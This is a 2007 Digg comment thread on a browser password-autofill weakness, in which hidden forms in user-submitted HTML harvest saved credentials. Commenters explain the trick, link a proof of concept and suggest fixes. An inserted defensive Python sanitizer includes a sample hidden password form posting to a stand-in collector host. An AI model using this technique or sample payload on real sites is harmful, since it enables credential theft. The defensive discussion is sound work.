80 Comments
- beachbrian, on 10/12/2007, -4/+38 do you have any idea how those work? ... here, have a cookie.
- sockpuppets, on 10/12/2007, -1/+27 I wish I hadn't named my dog "password" now.
- elnerdo, on 10/12/2007, -5/+26 ...
"3. This is not a security hole, it is by design."
Why do you even talk?
- robdazomba, on 10/12/2007, -2/+22 Truly impressive, the computer geek who can pick on teenage girls. Just hope you never meet one of them in person, as I'm sure many of them could kick the living crap out of you without breaking a sweat.
- CaffeineAddict, on 10/12/2007, -2/+21 Ok, I read through the story and while this doesn't just affect Firefox ... it is a browser exploit.
What happens is that any web site that you have a saved user name / password for that also allows users to submit HTML code for others to view (aka myspace, vB/phpBB forums that have this enabled (not the default setting), blogs that allow HTML submissions etc.) ... will allow a clever script-kiddy to fake a username / password entry form that shows up to the browser (which most browsers will auto-fill per your settings) but may not be visible to the person looking at the site ... furthermore the script-kiddy will put a link in the form of a transparent image on top of this form ... and the link will take the information out of the username / password entries and put it into the URL in your address bar.
It's kinda hard to explain without seeing it live. A proof of concept version is available in the link provided below. DO NOT TYPE IN A REAL USERNAME OR PASSWORD, just a fake one so you can see how it works ... and when IE or FF asks you to remember the password you must select [yes].
http://www.info-svc.com/news/11-21-2006/rcsr1/
Yes, this does work ... yes, this is a security hole for Firefox, IE, and any other web browser that allows you to save passwords and have them auto-fill the username / password section of a website.
For any of you who saw the mass password list with 48,000 usernames / passwords for myspace yesterday before the digg admin made it disappear from digg ... this is most likely how they got all the passwords.
- tpaine, on 10/12/2007, -0/+15 Keep in mind that a site must also allow users to post unmolested HTML (e.g. myspace). However, if you clicked on one of these RCSR images while visiting myspace.com they can *not* grab your BofA.com password, only the myspace.com password.
- marko25, on 10/12/2007, -1/+14 Opera is NOT vulnerable.
Test it here: http://www.info-svc.com/news/11-21-2006/rcsr1/
- arunforce, on 10/12/2007, -3/+16 It's called phishing, dumbass.
Now give me my 5 bucks.
- LecherousVenom, on 10/12/2007, -9/+21 Buried as "Inaccurate."
This is not a FF exploit - it exploits multiple browsers.
Maybe I missed something, but this seems like a scripting exploit, and not a "browser" exploit, per se. For this to work, you'd have to have access to the domain in question to post exploit code.... maybe this could be done in a comments section, but otherwise it's nigh impossible to implement on a site you don't own.
Can someone explain if I'm wrong about this?
- teddyrux, on 10/12/2007, -3/+13 How can you call this unfortunate? The more people that use the program, the more there are to expose the problems, and the more people there will be to patch them. It's a benefit of success, not a downfall.
- cds0528, on 10/12/2007, -2/+11 wow that stinks... Am I the only one who didn't really want to click on that demonstration link?
- shakin, on 10/12/2007, -0/+9 "There is simply no way for an open-source program to securely save passwords through a two-way algorithm without a master password."
There is no more risk associated with open source programs than there is with closed source programs. Whenever passwords are saved for a user it is a good idea to keep them encrypted with a key created by the user. This is what global password managers do (OS X keyring, KDE wallet, Gnome keyring). Unfortunately, Windows doesn't have such a thing. I think Firefox should use the global password manager on systems that support it.
- PatrickFisher, on 10/12/2007, -19/+28 Well, the more popular Firefox becomes, the more bugs and security holes we'll see. It's unfortunately inevitable.
- MikeKnoop, on 10/12/2007, -0/+8 This isn't a hack per se, I mean, Firefox will automatically fill in a hidden password field. That's what the password remember feature is. You need the content to sit on the domain you want to exploit too, severely limiting how effective this is.
I figure you could easily fix this by not auto-completing hidden fields. But even then you could put content OVER the fields and hide them...
Meh, it's a mess.
-Mike
- toomuchgreentea, on 10/12/2007, -0/+8 @qbm85
I'm not sure what you're saying is relevant at all. And as far as I can tell, this is how the "hack" works:
Firefox fills in the username and password based on the domain, and because the form is filled immediately after the page is loaded, it can be extracted using JavaScript and sent anywhere. But first and foremost, you'll have to match the domain, and that can't be done using a phishing site with misplaced/international characters. You can only do that on one of the site's pages.
And it has absolutely nothing to do with whether you have encrypted the passwords you stored on your HD.
- tony134340, on 10/12/2007, -0/+8 Same here.
Rule #1: Never store your important passwords on a PC. I keep mine on a password-protected USB drive and the master password in my head.
- HuwJanus, on 10/12/2007, -1/+8 This doesn't work on Opera so I'll stick with that.
- CaffeineAddict, on 10/12/2007, -0/+6 I opened it up with IE just to find out what it was ... the link is harmless; this browser bug only really works on places you're familiar with AND that have the ability for users to submit HTML code for others to view ... aka myspace, phpbb forums, blogs etc ... it will only work on a site that you have saved a password for ... and will only allow them to steal the password for that one site.
For instance if it was built into someone's myspace page ... it would only allow it to steal your myspace password. If it's just on some random website ... it can't steal anything but the nonexistent username / password that you have never set up for that website that you have never been to before.
- merreborn, on 10/12/2007, -2/+8 IE has this flaw as well, and has no plan to correct it. I'm not sure about Opera.
- takeda, on 10/12/2007, -0/+6 Looks like once again Opera had a better solution from the start.
Instead of filling the form automatically, to get logged in you need to click on the wand icon (it automatically clicks the submit button).
PS. I just saw IE7 today... I have doubts that they'll regain their market share... Actually IE6 looks way better.
- ccheath, on 10/12/2007, -0/+4 best comment yet
- triple110, on 10/12/2007, -1/+4 @NovaMonket
A mental note you should make to yourself... admitting that you have committed a crime on a very public website will only lead to cars with pretty lights at your door. If you think you are going to become some famous haxor now, you are wrong. Grow up.
- tpaine, on 10/12/2007, -2/+5 I think you are mistaken. When I read the title I thought the same thing, but this has nothing to do with the master security password, it's an actual hack.
- takeda, on 10/12/2007, -0/+3 "Browsers do have some options to make this type of phishing harder.
- Only pre-fill form fields if they are visible (check css etc.)"
This is not a good solution; abusers will try different techniques (e.g. moving the form somewhere out of the viewing area, changing colors etc. I'm sure they'll find multiple ways, and fixing all of this would be pretty ugly).
"- Only pre-fill form fields if they are at the *exact url* where you saved the info (if it's another URL on the same domain, ask the user first)"
This would break a lot of sites (for example you have a site with a lot of pages - maybe a forum): if a user tries to access some page that is restricted, instead of seeing that page they will see the login/password screen, then after entering the information the user will be able to view the page. In that case each time the link will be different.
"- Always ask the user before pre-filling forms."
I think Opera did it right: instead of prefilling the form and waiting for the user to click submit, you have a special button called "wand" on the login page; you just click that button, and Opera fills in all of the details and automatically clicks submit.
It solves that security issue, and is actually more convenient, since you don't need to search for the submit button; you have the wand always in the same place (you can also call it using a shortcut or a mouse gesture, which is even more convenient).
- Majken, on 10/12/2007, -1/+4 What happens is when you go to www.digg.com and tell Firefox to remember your password, it will then fill out that username and password on ANY site that is on digg.com, so it'll do digg.com/login, digg.com/relogin, digg.com/post etc. It will NOT work on digg.com.myspace.com/login or myspace.com/digg.com/
As far as I understand it, the fact that Firefox is autofilling the passwords isn't the problem, it's that people will then hit the submit button. Although people that will hit the submit button are also likely to fill in the username/password by hand.
As someone said earlier, this is sophisticated phishing, not a security hole in the password code. You shouldn't have to worry about your banking passwords, because if someone has hacked into your banking website to put up a fake login page, then what else have they been able to do, with or without your password?
The question is, what should browsers do to protect users from this, what should hosts do to protect users from this, and what should users do to protect themselves?
- kennyvader, on 10/12/2007, -1/+3 @CaffeineAddict: the example site you give doesn't seem to suffer the problem in Opera or IE7? Does it only affect IE6 and FF?
- drudometkin, on 10/12/2007, -1/+3 I never save my bank information in the password saver thing, but stuff like my digg account and other minor things like that I do. I use Safari primarily, but I use Firefox all the time too.
- inactive, on 10/12/2007, -1/+3 This is a problem for websites that allow *any* user provided HTML, like myspace. A malicious user can present their own login form.
Here's the issue: browsers like Firefox and IE will autofill this malicious login form with your myspace username and password, without any intervention on your part. The form could even be hidden from view. The browsers do this because the form is hosted from the myspace.com domain, even though it was created by some malicious user.
Then, the malicious page simply gets you to click on something that will submit the form, like a movie or picture, and presto, your password is submitted to the destination of their choice without you knowing that anything is irregular.
Most web sites don't allow users to generate this kind of HTML -- the exploit can't be used to get your Digg password or your bank account -- but it can be used on myspace. It's one of many exploits that target myspace users. Outside of myspace it's not a threat.
- CaffeineAddict, on 10/12/2007, -1/+3 @kennyvader
It doesn't matter on the browser as much as on the browser's settings and the way people use it.
Any browser that remembers your password and has the capability to auto log you in to a website (a website that doesn't support this through a cookie already) will be affected by this "bug".
As mentioned below, this is not as much of a bug as advanced phishing ... it's like someone sitting in front of a free concert (who is not affiliated with said concert) asking for ID to let you in. Most people would go with the flow and present their ID, much as the browsers in question would present your credentials (username/password) when the HTML on a trusted website asks for it ... the problem is that these sites allow users to upload un-filtered HTML and then present this un-tested/un-trusted HTML to run with the credentials of the trusted domain (website).
- inactive, on 10/12/2007, -6/+8 Firefox is still vulnerable to clogged tubes. The fix would be more online gambling.
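The host-side fix several commenters above point at (tpaine's "unmolested html", inactive's same-domain login form, CaffeineAddict's "un-filtered HTML") is to never let third-party markup carry login forms, script, or form actions that post off-domain. The following is an added example, not code from Digg, MySpace or any commenter: a whitelist sanitizer for user-submitted HTML (hypothetical name RcsrSanitizer) run over a constructed snippet, with "myspace.com" assumed as the hosting site.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements that let third-party content harvest or exfiltrate saved credentials.
DROP_TAGS = {"form", "input", "button", "script", "iframe", "object", "embed", "base"}
NO_CLOSE = {"input", "base"}        # dropped tags that never have a closing tag
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "img", "br", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}

class RcsrSanitizer(HTMLParser):   # hypothetical helper, not any site's real filter
    def __init__(self, site_host):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host
        self.out, self.findings = [], []
        self.skip_depth = 0             # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag in DROP_TAGS:
            host = urlparse(attrs.get("action", "")).hostname if tag == "form" else None
            if host and host != self.site_host:
                self.findings.append(f"form action posts off-domain to {host}")
            if tag == "input" and attrs.get("type", "").lower() == "password":
                self.findings.append("password field in user-submitted content")
            self.findings.append(f"dropped <{tag}>")
            self.skip_depth += tag not in NO_CLOSE   # swallow the element's content
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                      # unknown tags vanish, their text survives
        kept = []
        for name, value in attrs.items():
            if name.startswith("on"):   # inline handlers are script by another name
                self.findings.append(f"dropped {name} handler on <{tag}>")
            elif name in ALLOWED_ATTRS.get(tag, set()):
                if urlparse(value).scheme in ("", "http", "https"):   # no javascript: URLs
                    kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_TAGS and tag not in NO_CLOSE:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))

def sanitize(markup, site_host):
    # Returns (clean_html, findings) for one piece of user-submitted markup.
    parser = RcsrSanitizer(site_host)
    parser.feed(markup)
    parser.close()
    return "".join(parser.out), parser.findings

# Constructed sample: a hidden login form plus two ways a click could trigger it.
SAMPLE = ('<p>Check out my <b>page</b>!</p><form style="display:none" action="http://collector.example/grab">'
          '<input name="u"><input type="password" name="p"></form>'
          '<a href="javascript:alert(1)">click</a><img src="/pics/cat.jpg" onload="run()">')
```

Calling `sanitize(SAMPLE, "myspace.com")` keeps only the paragraph, a stripped link and the image, and the findings list is what a host would log for abuse review.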
- miaow, on 10/12/2007, -0/+2 http://www.computeractive.co.uk/computeractive/news/2168209/computer-hacker-receives
- LecherousVenom, on 10/12/2007, -0/+1 @ Caffeine: Thanks for the explanation.... makes more sense now.
- lilme, on 10/12/2007, -0/+1 @astrosmash
You wouldn't even have to trick the user into clicking on something to submit the form. You could set a 3 second timer to allow the browser to fill in the hidden fields after page load, then submit the data back to the server via an XMLHttpRequest object.
- lilme, on 10/12/2007, -0/+1 Browsers do have some options to make this type of phishing harder.
- Only pre-fill form fields if they are visible (check css etc.)
- Only pre-fill form fields if they are at the *exact url* where you saved the info (if it's another URL on the same domain, ask the user first)
- Always ask the user before pre-filling forms.
- jamesong14, on 10/12/2007, -0/+1 I just recently started using the Firefox browser; truly I didn't know there is a bug in it. I do let Firefox remember my ID and PW for some of the websites. Thanks for the reminder, useful article!
- zanzaman, on 10/12/2007, -0/+1 Mac OS X: the hack mentioned reveals login & password in Firefox but NOT in Safari.
- xswag, on 10/12/2007, -1/+2 What about KeePass? That's my new favorite password manager and you can use it from a USB flash drive.
http://keepass.sourceforge.net/
- sunetos, on 10/12/2007, -0/+1 Well, it's definitely something to be aware of. However, all of the following conditions have to be met for this to steal a password:
1) You have to have already saved your pass on domain.com with autocomplete turned on
2) Domain.com must be a site that allows 3rd parties to post whatever HTML they want. It has to be third parties, b/c of course, domain.com already has your username/pass, so they wouldn't have anything to gain
3) The 3rd party would have to entice you to click on their form which calls a javascript submit function for the form.
4) The form would have to be allowed to submit to a domain that is NOT domain.com, otherwise this 3rd party would have no way to retrieve your info. Apparently, IE6 and FF2 both allow this. It's rather embarrassing that FF2 still allows this IMHO
From what I see, the obvious fix is to stop allowing JavaScript forms to submit cross-domain, just like the way ad blockers block images/flash that load from a different domain.
- joeysafe, on 10/12/2007, -0/+1 @poseiton
Good explanation, bad guess (tested). Opera is safe as pie and all I use.
- Majken, on 10/12/2007, -0/+1 It could be solved by doing what IE does, and only save the password for the EXACT same page all the time. This is annoying in a lot of places where, if you're not logged in, the URL doesn't redirect to site.com/login.php but will direct to site.com/pageyouwanttoposton?login.php and then direct back to the page you were trying to post on.
At the same time though, if someone has hacked the site, they can easily hack the login page itself and change where the submit button sends your username and password. There is no way to solve this without the domain hosts securing their sites.
- poseitun, on 10/12/2007, -0/+1 You have to CTRL-Click or press CTRL-Enter in Opera to use a prestored password in a login box. Usually you don't use this key-combo for clicking on an image ;-)
So Opera is not vulnerable in the same way as FF. But if you can trick a user into ctrl+clicking on an image (like this exploit)... I think you are all set... I haven't tested it though.
- gcauthon, on 10/12/2007, -0/+1 What exactly is the vulnerability? If you give your password to a site, then that site has your password. Is that a surprise? The site is free to give your password out to other sites. Again, is anyone surprised by this revelation? This is why you don't use the same password on every single site out there, especially sites you're unfamiliar with.
This is extremely misleading. The proof of concept does not do anything you don't explicitly tell it to do. You have to type in a password for their site and they fashion a link with your password in it. Anyone who thinks this is a vulnerability does not understand how passwords work.
As others have stated, this has nothing to do with Firefox or even JavaScript. If a site wanted to, they could just dump their password database to a file and email it to Google directly. Why mess around with the scripting?
- Gregac, on 10/12/2007, -1/+1 If I read right, it does not matter whether you have a master set; the attacker acts as an indirect intermediary. Your browser would send the information to the regular site as usual, however the intermediary could see it regardless. This appears it would work in all browsers; also it appears the attacker has to compromise the said site with some code injection algorithm. I am thinking if they can get access to a company's web server in the first place, there are lots of other things they could do than just intercept login scripts.
- DrDemo, on 10/12/2007, -0/+0 If you are inclined to allow the saving of passwords:
All is safe again, thanks to Sebastian Tschan.
We now have the Opera functionality with a Firefox extension...
Secure Login: https://addons.mozilla.org/firefox/4429/
A login extension similar to Opera's Wand login.
It uses the built-in password manager, but deactivates the prefilling of login forms.
- mbthompson, on 10/12/2007, -3/+3 I'm guessing it will be patched by tomorrow.
- followme, on 10/12/2007, -2/+2 http://www.siteadvisor.com/sites/p2pnet.net?ref=safe&aff_id=0
- Andos, on 10/12/2007, -0/+0 Simple way to put it:
UserA and UserB join "CommunitySite".
UserB posts some malicious HTML and JavaScript on CommunitySite's pages which UserA sees.
Because of the exploit, UserB will now have UserA's password. Not that great, is it?
I don't know how they could fix this, but I guess the browsers could prevent form fields that have been automatically filled from being read by JavaScript without asking the user for permission. Or maybe even ask the user before any XMLHttpRequest if nothing else works.
- KB1775, on 10/12/2007, -0/+0 This is a major security concern and could potentially have a large impact on electronic commerce if word gets out. So many people shop online and use electronic transactions because they believe the transactions to be safe/secure and reliable. With so many companies depending on electronic commerce to support their business and so many people using passwords to shop online, this bug could be disastrous to ecommerce. Seems like the ease of saving your password online might be outweighed by the possibility of having someone steal your password to myspace and then try it on every other site you visited to buy something. Some of those sites have credit card information and other sensitive information stored on them as well.
- mmweb, on 10/12/2007, -0/+0 Try RoboForm. I have had good experiences with it. But I don't know if it solves this problem. Do you know?
- CaffeineAddict, on 10/12/2007, -1/+1 ding ding ding ... we have a winner